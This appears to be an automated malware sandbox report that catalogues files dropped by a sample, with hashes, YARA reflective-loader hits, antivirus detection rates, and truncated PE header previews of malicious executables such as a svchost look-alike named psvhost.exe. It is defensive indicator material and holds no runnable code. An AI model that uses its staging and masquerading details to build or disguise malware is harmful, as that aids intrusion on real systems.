Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\476D.tmp.Server.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1662
Entropy (8bit):	5.358887818371853
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3oPtHo6hAHKzePHt1qHjHK9HK+HKoHx:iqlYqh3oPtI6eqzGNwDq9q+qoR
MD5:	D01A59A25A54C9BFF55A43129BC83EF7
SHA1:	3D8A80C8A83BB0200BEAEA7DF5C75308E906D4E2
SHA-256:	78F7E8BFC48044D0E9806DA63391A33633DB330B6AFE0F89C0F3930336943696
SHA-512:	CFE7F0D9BFD8DF6A804BC939AE1206C9A1E2A874AF8DCAC1ACDE8D80F257CBAE5707539AD5B2C22A1555F8076BE226E9EF9630C48D7D7D2FA1422D0C6470D22D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4BC4.tmp.Client.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.347863460191528
Encrypted:	false
SSDEEP:	24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoR1qE4jE4K5sXE4qdKm:MxHKXAHKzecYHKh3oPtHo6Z1qHjHKMHA
MD5:	54A35BA0C52DAD92F72A95BF0D28B57C
SHA1:	952FB1B41527E6899AFA00BAA14ADAED5D94DA4C
SHA-256:	775EA2475D29721BAF6265B12E7B610D451E1A8E42A8B49BA2F73A693A848FF2
SHA-512:	DCCE2FA4E7BC913FD40132B87D3D29DDCD4A2659EC7F84220EAF44E73032D452CDD64508816F8EE4AB4A32A6B9391D536E07F938F4EAB2ACB5CFB33314E956EB
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5087.tmp.update.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	739
Entropy (8bit):	5.348505694476449
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaWzAbDLI4MNldKZat92n4M6:ML9E4KlKDE4KhKiKhBsXE4qdK284j
MD5:	A65F13C4355387C4645D260206AE915F
SHA1:	F8857636BB3B50E634E96E7B0ECE6AD77656BA5F
SHA-256:	DB8CA2E253F03395ABECD812505666B3BD5CE699B798E3F624D22EE605FB290E
SHA-512:	0584E8911FD08CC0BB833C6373AE5D161D00CF40FB4533B5DD0D31F38CF1783BB25E34084995A2D116AFB01ABAD14005D62EE51A1D9B79E262EF28775B878AB6
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\53A5.tmp.update.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\62AB.tmp.build.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3293
Entropy (8bit):	5.3364558769830905
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q35VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	4ED743F7E1676539C322DAB36E328377
SHA1:	AAD5F8C6DF7C8CEC18522B9E572721A71F5182F3
SHA-256:	EBEEE88F4A11C2DB02A1AC83F7CF00BEADB70CF23670DA29487B6543A1EDCB00
SHA-512:	024E50C28044329DCEB38B02C7874F7FDB43FB84156E5C32ED8966F0682FFBA48A159D2DE96ADE52C33B5D3364612A9D1E16714B00944C18CD82D60F4479CADF
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqnnpe.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.347863460191528
Encrypted:	false
SSDEEP:	24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoR1qE4jE4K5sXE4qdKm:MxHKXAHKzecYHKh3oPtHo6Z1qHjHKMHA
MD5:	54A35BA0C52DAD92F72A95BF0D28B57C
SHA1:	952FB1B41527E6899AFA00BAA14ADAED5D94DA4C
SHA-256:	775EA2475D29721BAF6265B12E7B610D451E1A8E42A8B49BA2F73A693A848FF2
SHA-512:	DCCE2FA4E7BC913FD40132B87D3D29DDCD4A2659EC7F84220EAF44E73032D452CDD64508816F8EE4AB4A32A6B9391D536E07F938F4EAB2ACB5CFB33314E956EB
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, Publi

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	106000
Entropy (8bit):	4.022282363957134
Encrypted:	false
SSDEEP:	768:VcFioDKjdkbG8fvwU7jk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypXg:PJk/nSOe91z7NfphMiNG7nU1FY+KPZGt
MD5:	3F6F00ACED1999AAEFAF2084F923E5DF
SHA1:	21BB5A0565612F4DD5DECC44D8DEB17C97F9C7CE
SHA-256:	9A04C272FBEC461622FBBDD2DCDE8936F9BE1670D8BD1B857287417465998CE2
SHA-512:	656E7A0595E662E3057FA4009EB4532CFFFC587E29F7ABCED4C0A5E77D1C8B4E4A9253A2290D3D7357EF711C218F48D9B745E739695E6CC896C4891BEAD32EC2
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002f.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	104128
Entropy (8bit):	4.032117701154245
Encrypted:	false
SSDEEP:	768:k+cF1X5kGGC03AN3jk0VqVY3sbEBNjZLNMSJtVKTxK4z3nR1vYPWppc1mHfypgkn:kNki0wmVmoEvQD8hciVGFnIwFkKFDo
MD5:	CE076D8303C370AE939C56B9D2037315
SHA1:	AA3AB8A445CA8230380EF2419A627E4689E4D701
SHA-256:	2C85D864412BA5DB94B0A347A2554C428A19EF283B10CF91666B5F2A1DCB0FBB
SHA-512:	CE2BFD8B19CDD9B1A6699883C3C160170C1F775119C67A8151A18109A02D64E36F32D86F9DA40F2B258267E9CE24A6846167109B0229BF590A454FB7C1156F7A
Malicious:	false
Reputation:	unknown
Preview:	....h... ...............P...............Y......^... ..............h...W.......e.n.-.C.H.;.e.n.-.G.B...............@..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000030.db

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	106000
Entropy (8bit):	4.022282363957134
Encrypted:	false
SSDEEP:	768:VcFioDKjdkbG8fvwU7jk0O6Pq9+Se8zGNmLmDcJzy4JxzHkR1vIoVYsizmEDypXg:PJk/nSOe91z7NfphMiNG7nU1FY+KPZGt
MD5:	3F6F00ACED1999AAEFAF2084F923E5DF
SHA1:	21BB5A0565612F4DD5DECC44D8DEB17C97F9C7CE
SHA-256:	9A04C272FBEC461622FBBDD2DCDE8936F9BE1670D8BD1B857287417465998CE2
SHA-512:	656E7A0595E662E3057FA4009EB4532CFFFC587E29F7ABCED4C0A5E77D1C8B4E4A9253A2290D3D7357EF711C218F48D9B745E739695E6CC896C4891BEAD32EC2
Malicious:	false
Reputation:	unknown
Preview:	....h... ..............P..............Y...8...^...p...................W.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	225310
Entropy (8bit):	6.053295654393721
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
MD5:	A4623D0552D87941FBEFBE7133262D15
SHA1:	74080A949DA104FDAB34E2A9350B924E07C08C14
SHA-256:	8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
SHA-512:	4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack

Download File

Process:	C:\Windows\System32\relog.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	5.759468727856401
Encrypted:	false
SSDEEP:	1536:FwbKHmgTHUCEU3arJLgGYIkaY9a3nHxs+FhKek5:qb9gTHUCEUKrJqMYqRs+FhKes
MD5:	44BBCCD626DA8B8CB487E360334E1D07
SHA1:	1EE19B38C0DA64B550BD6E4D79B3753DB89025C9
SHA-256:	2F9B60E849EAA271EE6AB551BEA892AE06F4D7D7157AA9343700E14A1E897822
SHA-512:	5DCD1C5B985515363BDC705F31DB500371C05032ECA501F0707C147B04543D567EB5FD10E896F56B63111F8FCC5DB28C44AB521409FDA9F7643D888AC4B6FAD5
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 50%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.,..nB..nB..nB..nC.nB......nB......nB....&nB....TnB.....nB.%....nB.%....nB.%....nB.Rich.nB.........PE..d.....af.........." .................4....................................................`......................................... 2..W....&..x...............................L...................................`...p...............H............................text...o........................... ..`.rdata..wb.......d..................@..@.data...p<...@.......&..............@....pdata...............@..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack

Download File

Process:	C:\Windows\System32\relog.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	6.112502411451738
Encrypted:	false
SSDEEP:	6144:ezzdp8LAcykTpwOC6aTUO77nYXzTI7KUh6VDN/7PLj/n:ozdpukkTBUvohh/7/
MD5:	B59AE63E24F82DB7C43975D39496FB4A
SHA1:	6B6B3516FDA1AEC00499FE21CBFB53F81B47B372
SHA-256:	E5C2B8A9F0EE49CB3C934B94D2F4F18BA01FB46EE91A054399AA045F5D66D201
SHA-512:	0DDACF3F938E0C46A72969B30EC329EF8F649C39D5A72EE66184701DD0EC9F423D503A16A8860EE89B69A5409C2432A8A9CAF43A393433C8154ED9CA42201995
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 54% Antivirus: Virustotal, Detection: 55%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............tZ..tZ..tZ..uZ..tZE..Z..tZ}o.Z..tZ}o.Z..tZ}o.Z..tZ.l.Z..tZ.l.Z..tZ.l.Z..tZ.l.Z..tZ.l.Z..tZRich..tZ................PE..d....?.f.........." ................p.....................................................`............................................S...$...(................0...................................................m..p...............@............................text...<........................... ..`.rdata..C...........................@..@.data............(..................@....pdata...0.......2..................@..@.rsrc...............................@..@.reloc..d ......."..................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\zbi[1].exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	5.990664364126582
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
MD5:	839B3EFD5782B6FC122855665F3AA202
SHA1:	067C1B809106A1B9AD1641A9C745D4B83ECE1196
SHA-256:	91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
SHA-512:	1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.38453362821494
Encrypted:	false
SSDEEP:	24:3HWSKco4KmZjKbmOIld6emZ9tYs4RPQoUGt/NK3R8e9ia4:3WSU4xym/jmZ9tz4RIoUeNWR82m
MD5:	13B7FA9E1F857C2D4A4DEB31FF59056F
SHA1:	A9100FCCA4B31DCE5CAF369C137691BB2E4E4C48
SHA-256:	1758F330E863356AA9AD0CBA1CC2A75B0753CC82A8D06C20F14A2F558A20EC76
SHA-512:	FAB1F561B23552DD333E52F78340475289CE35FFF4E8A4D4477DBD4374410B6719C6EB0342FFF5631402E742031D779DA9F4562891CC2D1D4A99FA50A48C28D6
Malicious:	false
Reputation:	unknown
Preview:	@...e.................................~..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Microsoft\psvhost.exe

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	238080
Entropy (8bit):	5.990664364126582
Encrypted:	false
SSDEEP:	6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaP:DIQRG6Y4ziBl4Ud
MD5:	839B3EFD5782B6FC122855665F3AA202
SHA1:	067C1B809106A1B9AD1641A9C745D4B83ECE1196
SHA-256:	91EBCD79CFCBFEDDA3C557C5BB1EE5DA9F4D13D518491D22A0E92F2CAAB7BEC0
SHA-512:	1ABFA3908386A7E579837548978CE0BAC26CC2D9F3194EF652D2CE9810BBED84130D9CDDABDC100256A118E362A33D0933DF3511745F75DE06C8DFA2BB88FFE4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\psvhost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\xj40xovMsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	631296
Entropy (8bit):	7.5120496811594455
Encrypted:	false
SSDEEP:	12288:22QRXDD1yed0fsU4GSWgOvPESGj4s32xEdRCSHsjAZi96VG6wl:22Q9NXw2/wPOjdGxYADEVU
MD5:	BED8CDCED2D57BE2BD750F0F59991ECD
SHA1:	4E2A885B9387FCF040B7EB79892DE2F9FE55BCA4
SHA-256:	5F628663F71E3BAA55F10E6021597F7860BEF868284EB50B8958169DCBBFF4FD
SHA-512:	B85990A778C2462D57C3B314270BD1F397749450E75508E1012A14F21661358B98021EFB791F694D9EB05F49B0776EA3FF4C803F842F858DB5669968C477433F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 56%, Browse
Reputation:	unknown
